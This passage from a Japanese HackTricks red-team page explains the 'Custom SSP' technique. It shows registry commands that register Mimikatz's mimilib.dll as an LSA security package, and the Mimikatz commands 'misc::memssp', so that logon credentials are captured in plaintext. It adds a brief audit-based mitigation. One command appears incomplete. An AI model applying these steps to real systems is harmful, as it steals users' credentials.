hacktricks/windows-hardening/active-directory-methodology/custom-ssp.md
2024-04-06 18:36:04 +00:00

4.4 KiB
Raw Blame History

Custom SSP

htARTEHackTricks AWS Red Team Expert htARTEHackTricks AWS Red Team ExpertでAWSハッキングをゼロからヒーローまで学ぶ

HackTricksをサポートする他の方法

カスタムSSP

ここでSSPセキュリティサポートプロバイダとは何かを学びます。
マシンへのアクセスに使用される資格情報を平文でキャプチャするために、独自のSSPを作成できます。

Mimilib

Mimikatzによって提供されるmimilib.dllバイナリを使用できます。これにより、すべての資格情報が平文でファイルに記録されます。
dllをC:\Windows\System32\に配置します。
既存のLSAセキュリティパッケージのリストを取得します

{% code title="attacker@target" %}

PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

{% endcode %}

セキュリティ サポート プロバイダ リスト (セキュリティ パッケージ) に mimilib.dll を追加します:

reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

リブート後、すべての資格情報はC:\Windows\System32\kiwissp.log内で平文で見つけることができます。

メモリ内

また、Mimikatzを使用してこれを直接メモリにインジェクトすることもできます注意少し不安定で動作しない可能性があります

privilege::debug
misc::memssp

これは再起動を乗り越えられません。

緩和策

イベントID 4657 - HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages の作成/変更の監査

htARTEHackTricks AWS Red Team Expert でゼロからヒーローまでAWSハッキングを学ぶ

HackTricks をサポートする他の方法: